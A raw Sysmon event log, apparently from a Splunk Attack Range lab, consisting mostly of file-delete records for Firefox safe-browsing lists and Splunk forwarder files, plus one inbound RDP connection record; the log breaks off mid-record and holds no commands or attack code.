09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=09787D3485A141AB7CAF4E45097E41CF,SHA256=A4241698C55A5DDCAF3E4EC3F722118F9E907950C6C1F7392E2176F1E1465A09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=1AEEEA7EA60A51A8F1456D70A42D8B61,SHA256=B2DF4398A94473215D5780AA01A99E635D9682ECC0348239499A58FC9D9D5120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.591{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=1A2A0D76031427C66DD5EA7ADDEC1512,SHA256=44AE352EAFF903AA7391A6F54B4E361EB1EDC0CA0E1DA31CBA95030BF9EBF54B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.526{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=2F5C392EBC79E27B8B9BAD15C7CB74A0,SHA256=8A7C7434E00E8F4027865CF9485ECECBF5FBF8D53A9913DCF047649DD93C9059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.525{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-malware-proto.vlpsetMD5=064538D3390E65CB233A19B688286D61,SHA256=D36C3EE688F25BDF1DA9B30054A9CC343255CDF9A0C0BD61B0D9FB3690C38D44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977569Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:43.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EABFA4D2C461CD15F82B300153CDE73F,SHA256=62D601E2F9E2658152D37C6D33F9DDCC9E55CC84E97FE9F73D21C900893C4B9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977568Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:40.437{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-10269-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001048901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.507{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=AE6189F74716A8F32F14CCFEB9F379BF,SHA256=83932E763C98FE4DDAA607F84CE87F110EDDB391182C6A22E9FCB1799437A630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.507{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=EA86E0097B81FDBDEE3F12AC90CA6410,SHA256=6A242B62530E38DDCFD272643F6CC44EDC0208C69DC3022D6CC273F4C7E79AF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.507{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=5ACD66DB29AFABE23566110E44DBD5E7,SHA256=AD73B565DED09760945E8AC426CD4D16C8DEB3C202E8ABAD356EABF62137D2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.507{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=09730D2F4F3A8D37AA089DE0FB5A9366,SHA256=994D7D3A877BAD02F071B9706C59131E2D758D189E15749F1B30F8058AD74552,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.507{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=96C2F19F1842DCB0D73739830623C769,SHA256=D0419C462A55E1634AFF5B51C08E481312AF6A36B5EBA1AFDC2458967705E5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048896Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.507{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048895Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=FEC9BC354A7EE92C6FEEFE63E6B0FA26,SHA256=258EF8E6994A09FFB54BD0D5AFEC97C13C31F2EEFB7FE90A2A4C487C87817519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048894Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048893Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048892Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048891Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048890Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048889Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=07FF16BA9846838DA27AE094A1B91369,SHA256=DC83AE90504AC11C29876CFC48483976397E899958EE8EDE7F381971A2C2C4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.491{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=1B9A162CEB3C7BE8393CE348F35A4564,SHA256=2D6B6351BD1B8C2047DA1854D0033EE6C5CD9F1BFE38C5E1A2B82C86AFE8A598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=BF6C363FCFE18836F5B693AC897B03D0,SHA256=3436668289A12D65E3C22BC60B8E2EA8D2D6CF15DF1402FCB3C16DD875D438E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=D5F2E2EC2D972EA4E3BD5E52478574EC,SHA256=5A9F549160D35C4F4CCD6CC4EF4B63FF1A8859F8374AEA866A10F61DC2559E58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=82E921320B62879B070EBE9D8F1F4256,SHA256=A781BFF04964067CB06EA80DA605A4A2837F7256580693C6DBDCA971D8C9BDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=BB9BB51CB484CC5719D210D53CF37762,SHA256=1903A36C25AEB3C61953484ED931ED52AB4A3BD13FCC38046154A6681472D499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=914534BA8A40B6B03D6D9B771F2B19BD,SHA256=35A2915F1843458284C8FC7CA759EA2429663896ED02845849FA9A318F53EC0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=AE7986A0220B25D6A8A8D964DFAB18A9,SHA256=204DECEAD5EF0D73D35420F74EF89BB5E7080007726E198A26D8553BA5B257D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=4E114A12FE1D8664A2957286D9C690B5,SHA256=6A1E487E1A25DA4010DCE4BC9DD610DEF85DA683FAC9D704DD2A50664E5A60BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.475{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=775AAB007F2E4FF49FC45DB938962B25,SHA256=D3DA5191342AAD67DAE5D80DF6ADE9D325A8A9D1131BADFC19152B6468A62E3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.460{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=96C2F19F1842DCB0D73739830623C769,SHA256=D0419C462A55E1634AFF5B51C08E481312AF6A36B5EBA1AFDC2458967705E5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.444{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.360{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=1AEEEA7EA60A51A8F1456D70A42D8B61,SHA256=B2DF4398A94473215D5780AA01A99E635D9682ECC0348239499A58FC9D9D5120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.360{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.360{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=AE6189F74716A8F32F14CCFEB9F379BF,SHA256=83932E763C98FE4DDAA607F84CE87F110EDDB391182C6A22E9FCB1799437A630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.344{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.329{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=2F5C392EBC79E27B8B9BAD15C7CB74A0,SHA256=8A7C7434E00E8F4027865CF9485ECECBF5FBF8D53A9913DCF047649DD93C9059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:43.281{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977574Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:44.981{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24016027E2BD54635843E0F602FD5F7C,SHA256=BFBC3565C0BD735A185E8B8AB2485A86CC4B518C6F0EBDCCB39E1F1CBA087DAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977573Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:44.903{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82F57F41D48557A674E3A0A585D004F1,SHA256=C4690D1BFAC2A87F8F2F9A5B867B9C9DE9ECBD7A2AD72CF01A4EB43C016A9434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.945{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51B0C13650439F48009C6B31AAACE082,SHA256=41F26C4E5271F64968A6E8D11A746278080297D08AC74F0948BECEFB426AF5D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:44.760{5EBD8912-8968-6151-087A-00000000FC01}64125980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 